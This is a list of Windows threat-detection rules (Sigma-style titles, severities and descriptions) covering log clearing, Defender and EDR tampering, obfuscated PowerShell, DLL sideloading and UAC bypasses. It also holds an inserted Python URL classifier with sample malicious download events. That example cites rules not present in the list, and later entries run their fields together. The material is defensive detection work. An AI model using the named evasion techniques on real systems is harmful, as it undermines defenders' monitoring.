Windows Event Auditing Disabled (low): Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used in a scenario where an entity wants to bypass local logging to evade detection when Windows event logging is enabled and reviewed. It is also recommended to turn off "Local Group Policy Object Processing" via GPO, which makes sure that Active Directory GPOs take precedence over local computer policies edited via something such as "gpedit.msc". Please note that disabling "Local Group Policy Object Processing" may cause issues in scenarios of one-off specific GPO modifications; however, it is recommended to perform these modifications in Active Directory anyway.
Important Windows Event Auditing Disabled (high): Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.
ETW Logging Disabled In .NET Processes - Registry (high): Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.
HackTool - EDRSilencer Execution - Filter Added (high): Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents, based on specific hardcoded filter names.
Invoke-Obfuscation CLIP+ Launcher - Security (high): Detects obfuscated use of Clip.exe to execute PowerShell.
Invoke-Obfuscation Obfuscated IEX Invocation - Security (high): Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references.
Invoke-Obfuscation STDIN+ Launcher - Security (high): Detects obfuscated use of stdin to execute PowerShell.
Invoke-Obfuscation VAR+ Launcher - Security (high): Detects obfuscated use of environment variables to execute PowerShell.
Invoke-Obfuscation COMPRESS OBFUSCATION - Security (medium): Detects obfuscated PowerShell via COMPRESS OBFUSCATION.
Invoke-Obfuscation RUNDLL LAUNCHER - Security (medium): Detects obfuscated PowerShell via RUNDLL LAUNCHER.
Invoke-Obfuscation Via Stdin - Security (high): Detects obfuscated PowerShell via stdin in scripts.
Invoke-Obfuscation Via Use Clip - Security (high): Detects obfuscated PowerShell via use of Clip.exe in scripts.
Invoke-Obfuscation Via Use MSHTA - Security (high): Detects obfuscated PowerShell via use of MSHTA in scripts.
Invoke-Obfuscation Via Use Rundll32 - Security (high): Detects obfuscated PowerShell via use of Rundll32 in scripts.
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security (high): Detects obfuscated PowerShell via VAR++ LAUNCHER.
NetNTLM Downgrade Attack (high): Detects a NetNTLM downgrade attack.
New or Renamed User Account with '$' Character (medium): Detects the creation of a user with the "$" character in the name. This can be used by attackers to hide a user or to trick detection systems that lack the parsing mechanisms.
RDP over Reverse SSH Tunnel WFP (high): Detects svchost hosting the RDP service (termsvcs) communicating with the loopback address.
Service Registry Key Read Access Request (low): Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the registry entries used by services. Adversaries may use flaws in the permissions of registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
Potential Secure Deletion with SDelete (medium): Detects files with extensions commonly seen while SDelete is used to wipe files.
Account Tampering - Suspicious Failed Logon Reasons (medium): Uses uncommon error codes on failed logons to identify suspicious activity and tampering with accounts that have been disabled or otherwise restricted.
Password Protected ZIP File Opened (medium): Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
Password Protected ZIP File Opened (Suspicious Filenames) (high): Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
Password Protected ZIP File Opened (Email Attachment) (high): Detects the extraction of password protected ZIP archives received as email attachments. See the filename variable for more details on which file has been opened.
Unauthorized System Time Modification (low): Detects scenarios where a potentially unauthorized application or user is modifying the system time.
Sysmon Channel Reference Deletion (high): Detects potential threat actor tampering with the Sysmon manifest, eventually disabling it.
Potential Privileged System Service Operation - SeLoadDriverPrivilege (medium): Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools, so you have to work with a whitelist to find the bad stuff.
Windows Defender Exclusion List Modified (medium): Detects modifications to the Windows Defender exclusion registry key. This could indicate potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
Windows Defender Exclusion Deleted (medium): Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to cover their tracks by removing the added exclusions.
Windows Defender Exclusion Registry Key - Write Access Requested (medium): Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle to or access the object to write new exclusions in order to bypass security.
Potential Access Token Abuse (medium): Detects potential token impersonation and theft. Example: when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.
Outgoing Logon with New Credentials (low): Detects logon events that specify new credentials.
Windows Filtering Platform Blocked Connection From EDR Agent Binary (high): Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent EDR agents from reporting security events.
Microsoft Defender Blocked from Loading Unsigned DLL (high): Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL.
Unsigned Binary Loaded From Suspicious Location (high): Detects the Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations.
Sysmon Application Crashed (high): Detects an application popup reporting a failure of the Sysmon service.
NTLMv1 Logon Between Client and Server (medium): Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
DHCP Server Error Failed Loading the CallOut DLL (high): Detects a DHCP server error in which the Callout DLL specified in the registry could not be loaded.
DHCP Server Loaded the CallOut DLL (high): Detects a DHCP server loading the Callout DLL specified in the registry.
Eventlog Cleared (medium): One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution.
Important Windows Eventlog Cleared (high): Detects the clearing of one of the Windows core event logs, e.g. caused by "wevtutil cl" command execution.
Windows Defender Threat Detection Service Disabled (medium): Detects when the "Windows Defender Threat Protection" service is disabled.
Invoke-Obfuscation CLIP+ Launcher - System (high): Detects obfuscated use of Clip.exe to execute PowerShell.
Invoke-Obfuscation Obfuscated IEX Invocation - System (high): Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references.
Invoke-Obfuscation STDIN+ Launcher - System (high): Detects obfuscated use of stdin to execute PowerShell.
Invoke-Obfuscation VAR+ Launcher - System (high): Detects obfuscated use of environment variables to execute PowerShell.
Invoke-Obfuscation COMPRESS OBFUSCATION - System (medium): Detects obfuscated PowerShell via COMPRESS OBFUSCATION.
Invoke-Obfuscation Via Stdin - System (high): Detects obfuscated PowerShell via stdin in scripts.
Invoke-Obfuscation RUNDLL LAUNCHER - System (medium): Detects obfuscated PowerShell via RUNDLL LAUNCHER.
Invoke-Obfuscation Via Use Clip - System (high): Detects obfuscated PowerShell via use of Clip.exe in scripts.
Invoke-Obfuscation Via Use MSHTA - System (high): Detects obfuscated PowerShell via use of MSHTA in scripts.
Invoke-Obfuscation Via Use Rundll32 - System (high): Detects obfuscated PowerShell via use of Rundll32 in scripts.
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System (high): Detects obfuscated PowerShell via VAR++ LAUNCHER.
Important Windows Service Terminated With Error (high): Detects important or interesting Windows services that were terminated with an error, for whatever reason.
Windows Service Terminated With Error (low): Detects Windows services that were terminated with an error, for whatever reason.
Important Windows Service Terminated Unexpectedly (high): Detects important or interesting Windows services that were terminated unexpectedly.
Windows Defender Grace Period Expired (high): Detects the expiration of the Windows Defender grace period. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
Windows Defender Exclusions Added (medium): Detects the setting of Windows Defender exclusions.
Windows Defender Exploit Guard Tamper (high): Detects when someone adds or removes applications or folders from the Exploit Guard "ProtectedFolders" or "AllowedApplications" lists.
Windows Defender Submit Sample Feature Disabled (low): Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.
Windows Defender Malware And PUA Scanning Disabled (high): Detects disabling of the Windows Defender feature that scans for malware and other potentially unwanted software.
Windows Defender Malware Detection History Deletion (informational): Windows Defender logs when the history of detected infections is deleted.
Windows Defender Real-time Protection Disabled (high): Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain much information on who initiated the action, you might want to reduce it to "medium" level if it occurs too often in your environment.
Windows Defender Real-Time Protection Failure/Restart (medium): Detects issues with Windows Defender Real-Time Protection features.
Win Defender Restored Quarantine File (high): Detects the restoration of files from the Defender quarantine.
Windows Defender Configuration Changes (high): Detects suspicious changes to the Windows Defender configuration.
Microsoft Defender Tamper Protection Trigger (high): Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring".
Windows Defender Virus Scanning Feature Disabled (high): Detects disabling of the Windows Defender virus scanning feature.
HackTool - CACTUSTORCH Remote Thread Creation (high): Detects remote thread creation by CACTUSTORCH as described in the references.
HackTool - Potential CobaltStrike Process Injection (high): Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons.
Remote Thread Creation Via PowerShell In Uncommon Target (medium): Detects the creation of a remote thread from a PowerShell process in an uncommon target process.
Rare Remote Thread Creation By Uncommon Source Image (high): Detects rare, uncommon processes creating remote threads.
Remote Thread Created In Shell Application (medium): Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
Remote Thread Creation By Uncommon Source Image (medium): Detects uncommon processes creating remote threads.
Remote Thread Creation In Uncommon Target Image (medium): Detects uncommon target processes for remote thread creation.
Remote Thread Creation Ttdinject.exe Proxy (high): Detects a remote thread creation by Ttdinject.exe used as a proxy.
Creation Of a Suspicious ADS File Outside a Browser Download (medium): Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers.
Hidden Executable In NTFS Alternate Data Stream (medium): Detects the creation of an ADS (Alternate Data Stream) that contains an executable, by looking for a non-empty Imphash.
Suspicious File Download From File Sharing Websites - File Stream (high): Detects the download of a suspicious file type from a well-known file and paste sharing domain.
Unusual File Download From File Sharing Websites - File Stream (medium): Detects the download of an unusual file type from a well-known file and paste sharing domain.
HackTool Named File Stream Created (high): Detects the creation of a named file stream with the Imphash of a well-known hack tool.
Exports Registry Key To an Alternate Data Stream (high): Detects the export of the target registry key into the specified alternate data stream, where it is hidden.
Unusual File Download from Direct IP Address (high): Detects the download of a suspicious file type from URLs with an IP address instead of a hostname.
Potential Suspicious Winget Package Installation (high): Detects a potentially suspicious winget package installation from a suspicious source.
Potentially Suspicious File Download From ZIP TLD (high): Detects the download of a file with a potentially suspicious extension from a .zip top level domain.
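The download-origin rules above (Download from Suspicious Dyndns Hosts, Bitsadmin to Uncommon IP Server Address / Uncommon TLD, the BITS Transfer Job download rules, Unusual File Download from Direct IP Address and Potentially Suspicious File Download From ZIP TLD) all reduce to the same question: where is the remote file coming from and where is it being written. The following is an added example, not code from the SigmaTACT report or the Sigma project; it normalises a URL once and returns every indicator it trips. The indicator lists (file-sharing domains, dynamic-DNS suffixes, TLDs, extensions, local folders) and the sample BITS events are assumptions constructed for the example; the real rules carry longer curated lists and their own field names.

```python
"""Classify download URLs and BITS save paths against the download-origin rules.

Added example, not code from the SigmaTACT report or the Sigma project. All indicator
lists below are illustrative assumptions, not the Sigma rules' own lists.
"""
import ipaddress
from urllib.parse import urlsplit

FILE_SHARING_DOMAINS = {"pastebin.com", "transfer.sh", "anonfiles.com", "mega.nz", "cdn.discordapp.com"}
DYNDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org", ".hopto.org")
UNCOMMON_TLDS = {"zip", "top", "xyz", "gq", "ml", "tk", "cf", "ga"}
SUSPICIOUS_EXTENSIONS = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".hta", ".scr", ".js", ".iso")
SUSPICIOUS_LOCAL_DIRS = ("\\users\\public\\", "\\windows\\temp\\", "\\programdata\\", "\\appdata\\local\\temp\\")


def _is_ip_literal(host: str) -> bool:
    """True for an IPv4 or IPv6 literal (urlsplit strips the [] around IPv6)."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_download(url: str) -> set:
    """Return the set of indicator tags a single remote URL would trip."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    path = parts.path.lower()
    tags = set()
    if not host:
        return tags
    if path.endswith(SUSPICIOUS_EXTENSIONS):
        tags.add("suspicious_extension")
    # Direct-IP download: no TLD or domain checks apply to an IP literal
    if _is_ip_literal(host):
        tags.add("direct_ip")
        return tags
    tld = host.rsplit(".", 1)[-1]
    if tld in UNCOMMON_TLDS:
        tags.add("uncommon_tld")
    # A .zip TLD serving an executable looks like an archive to the user
    if tld == "zip" and "suspicious_extension" in tags:
        tags.add("zip_tld_download")
    if any(host == d or host.endswith("." + d) for d in FILE_SHARING_DOMAINS):
        tags.add("file_sharing_domain")
    if host.endswith(DYNDNS_SUFFIXES):
        tags.add("dyndns_host")
    return tags


def classify_bits_job(remote_name: str, local_name: str) -> set:
    """Remote-URL checks plus the LocalName (save path) check of the BITS rules."""
    tags = classify_download(remote_name)
    if any(d in local_name.lower() for d in SUSPICIOUS_LOCAL_DIRS):
        tags.add("suspicious_local_folder")
    return tags


# Constructed sample BITS transfer events (not real log data).
SAMPLE_EVENTS = [
    {"RemoteName": "https://cdn.example.com/setup.msi", "LocalName": "C:\\Users\\alice\\Downloads\\setup.msi"},
    {"RemoteName": "http://198.51.100.7/update.exe", "LocalName": "C:\\Users\\Public\\update.exe"},
    {"RemoteName": "https://files.evil-host.zip/invoice.exe", "LocalName": "C:\\Windows\\Temp\\invoice.exe"},
    {"RemoteName": "https://transfer.sh/abc/tool.ps1", "LocalName": "C:\\ProgramData\\tool.ps1"},
    {"RemoteName": "http://c2.duckdns.org/stage2.dll", "LocalName": "C:\\Users\\alice\\AppData\\Local\\Temp\\s.dll"},
]


def scan_events(events=SAMPLE_EVENTS):
    """Return [(RemoteName, sorted tags)] for every event that trips at least one indicator."""
    out = []
    for ev in events:
        tags = classify_bits_job(ev["RemoteName"], ev["LocalName"])
        if tags:
            out.append((ev["RemoteName"], sorted(tags)))
    return out


if __name__ == "__main__":
    for remote, tags in scan_events():
        print(remote, "->", ", ".join(tags))
```

Because the IP-literal check returns before any TLD logic runs, an IPv6 host such as `http://[2001:db8::1]/a.hta` is tagged as a direct-IP download rather than being mis-parsed as a domain with TLD "1". The first sample event (a signed-looking MSI from a .com CDN to the user's Downloads folder) trips nothing, which is the behaviour the "uncommon"/"suspicious" qualifiers in the rule titles intend.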
DNS Query Request By Regsvr32.EXE (medium): Detects DNS queries initiated by "Regsvr32.exe".
WinDivert Driver Load (high): Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows.
File Creation Date Changed to Another Year (high): Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
Potential PrintNightmare Exploitation Attempt (high): Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675.
EventLog EVTX File Deleted (medium): Detects the deletion of event log files, which may indicate an attempt to destroy forensic evidence.
Exchange PowerShell Cmdlet History Deleted (high): Detects the deletion of the Exchange PowerShell cmdlet history logs, which may indicate an attempt to destroy forensic evidence.
Process Deletion of Its Own Executable (medium): Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
IIS WebServer Access Logs Deleted (medium): Detects the deletion of IIS web server access logs, which may indicate an attempt to destroy forensic evidence.
PowerShell Console History Logs Deleted (medium): Detects the deletion of the PowerShell console history logs, which may indicate an attempt to destroy forensic evidence.
Prefetch File Deleted (high): Detects the deletion of a prefetch file, which may indicate an attempt to destroy forensic evidence.
TeamViewer Log File Deleted (low): Detects the deletion of the TeamViewer log files, which may indicate an attempt to destroy forensic evidence.
Tomcat WebServer Logs Deleted (medium): Detects the deletion of Tomcat web server logs, which may indicate an attempt to destroy forensic evidence.
File Deleted Via Sysinternals SDelete (medium): Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern SDelete uses when renaming files before deletion.
ADS Zone.Identifier Deleted By Uncommon Application (medium): Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS, such as those in Microsoft Office apps.
EVTX Created In Uncommon Location (medium): Detects the creation of new files with the ".evtx" extension in a non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within. Note that backup software and legitimate administrators might perform similar actions during troubleshooting.
Creation Of Non-Existent System DLL (medium): Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
Files With System DLL Name In Unsuspected Locations (medium): Detects the creation of a file with the ".dll" extension that has the name of a system DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Files With System Process Name In Unsuspected Locations (medium): Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Dynamic CSharp Compile Artefact (low): When C# is compiled dynamically, a .cmdline file is created as part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
DLL Search Order Hijackig Via Additional Space in Path (high): Detects when an attacker creates a folder structure similar to Windows system folders such as (Windows, Program Files...) but with an added space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack.
Potentially Suspicious DMP/HDMP File Creation (medium): Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Such files are often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
HackTool - Powerup Write Hijack DLL (high): PowerUp's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious .bat file (debug.bat by default).
Potential Initial Access via DLL Search Order Hijacking (medium): Detects attempts by an unusual process to create a DLL file in a known desktop application dependencies folder such as that of Slack, Teams or OneDrive. This may indicate an attempt to load a malicious module via DLL search order hijacking.
Malicious DLL File Dropped in the Teams or OneDrive Folder (high): Detects creation of a malicious DLL file in the location used by the OneDrive or Teams applications. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.
Uncommon File Creation By Mysql Daemon Process (high): Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware.
Suspicious DotNET CLR Usage Log Artifact (high): Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly has finished executing for the first time in the (user) session context.
Suspicious File Creation In Uncommon AppData Folder (high): Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This could be used to bypass detections that exclude the AppData folder for fear of false positives.
SCR File Write Event (medium): Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver", for example.
OneNote Attachment File Dropped In Suspicious Location (medium): Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments.
Suspicious File Created Via OneNote Application (high): Detects suspicious files created via the OneNote application. This could indicate that a potentially malicious ".one"/".onepkg" file was executed, as seen being used in malware activity in the wild.
.RDP File Created by Outlook Process (high): Detects the creation of files with the ".rdp" extension in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments.
Publisher Attachment File Dropped In Suspicious Location (medium): Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents.
PSScriptPolicyTest Creation By Uncommon Process (medium): Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker.
.RDP File Created By Uncommon Application (high): Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
Potential Winnti Dropper Activity (high): Detects files dropped by Winnti as described in the RedMimicry Winnti playbook.
PDF File Created By RegEdit.EXE (high): Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
Self Extraction Directive File Created In Potentially Suspicious Location (medium): Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers have been seen abusing this utility and creating PE files with embedded ".sed" entries.
Windows Binaries Write Suspicious Extensions (high): Detects Windows executables that write files with suspicious extensions.
Suspicious Creation with Colorcpl (high): Detects file creation by colorcpl.exe, which, once executed, copies an arbitrary file to C:\Windows\System32\spool\drivers\color\.
Created Files by Microsoft Sync Center (medium): Detects suspicious files created by Microsoft Sync Center (mobsync).
Suspicious Files in Default GPO Folder (medium): Detects the creation of copies of suspicious files (EXE/DLL) in the default GPO storage folder.
Suspicious Double Extension Files (high): Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hides known file extensions by default.
Suspicious Executable File Creation (high): Detects creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
Suspicious Get-Variable.exe Creation (high): Get-Variable is a valid PowerShell cmdlet. WindowsApps is by default in the PATH where PowerShell is executed, so when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the PATH and executes the malicious binary instead of looking for the PowerShell cmdlet.
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream (medium): Detects the creation of a hidden file/folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe".
Potential Homoglyph Attack Using Lookalike Characters in Filename (medium): Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.
Legitimate Application Dropped Archive (high): Detects programs on a Windows system that should not write an archive to disk.
Legitimate Application Dropped Executable (high): Detects programs on a Windows system that should not write executables to disk.
Legitimate Application Dropped Script (high): Detects programs on a Windows system that should not write scripts to disk.
Suspicious LNK Double Extension File Created (medium): Detects the creation of files with "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Suspicious PROCEXP152.sys File Created In TMP (medium): Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
Suspicious File Creation Activity From Fake Recycle.Bin Folder (high): Detects file write events from/to a fake recycle bin folder that is often used as a staging directory for malware.
Potential File Extension Spoofing Using Right-to-Left Override (high): Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
Drop Binaries Into Spool Drivers Color Folder (medium): Detects the creation of suspicious binary files inside "\windows\system32\spool\drivers\color\" as seen in the blog referenced below.
LiveKD Kernel Memory Dump File Created (high): Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
LiveKD Driver CreationmediumDetects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Driver Creation By Uncommon ProcesshighDetects the creation of the LiveKD driver by a process image other than "livekd.exe".
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
UAC Bypass Using Consent and Comctl32 - FilehighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using .NET Code Profiler on MMChighDetects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using EventVwrhighDetects the pattern of a UAC bypass using Windows Event Viewer
UAC Bypass Using IDiagnostic Profile - FilehighDetects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - FilehighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - FilehighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using NTFS Reparse Point - FilehighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Abusing Winsat Path Parsing - FilehighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - FilehighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Creation of WerFault.exe/Wer.dll in Unusual FoldermediumDetects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - FilemediumDetects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
UEFI Persistence Via Wpbbin - FileCreationhighDetects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
Potentially Suspicious Self Extraction Directive File CreatedmediumDetects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.
DLL Loaded From Suspicious Location Via Cmspt.EXEhighDetects cmstp loading "dll" or "ocx" files from suspicious locations
Amsi.DLL Loaded Via LOLBIN ProcessmediumDetects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
Potential Azure Browser SSO AbuselowDetects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
Suspicious Renamed Comsvcs DLL Loaded By Rundll32highDetects rundll32 loading a renamed comsvcs.dll to dump process memory
Load Of RstrtMgr.DLL By A Suspicious ProcesshighDetects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Load Of RstrtMgr.DLL By An Uncommon ProcesslowDetects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXEhighDetects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
Time Travel Debugging Utility Usage - ImagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Suspicious Volume Shadow Copy Vssapi.dll LoadhighDetects the image load of VSS DLL by uncommon executables
Potentially Suspicious Volume Shadow Copy Vsstrace.dll LoadmediumDetects the image load of VSS DLL by uncommon executables
Suspicious Volume Shadow Copy VSS_PS.dll LoadhighDetects the image load of vss_ps.dll by uncommon executables
HackTool - SharpEvtMute DLL LoadhighDetects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs
PowerShell Core DLL Loaded Via Office ApplicationmediumDetects PowerShell core DLL being loaded by an Office Product
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Potential appverifUI.DLL SideloadinghighDetects potential DLL sideloading of "appverifUI.dll"
Potential AVKkid.DLL SideloadingmediumDetects potential DLL sideloading of "AVKkid.dll"
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Using Coregen.exemediumDetect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
System Control Panel Item Loaded From Uncommon LocationmediumDetects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential DLL Sideloading Of DbgModel.DLLmediumDetects potential DLL sideloading of "DbgModel.dll"
Potential EACore.DLL SideloadinghighDetects potential DLL sideloading of "EACore.dll"
Potential Edputil.DLL SideloadinghighDetects potential DLL sideloading of "edputil.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential Goopdate.DLL SideloadingmediumDetects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Potential Iviewers.DLL SideloadinghighDetects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
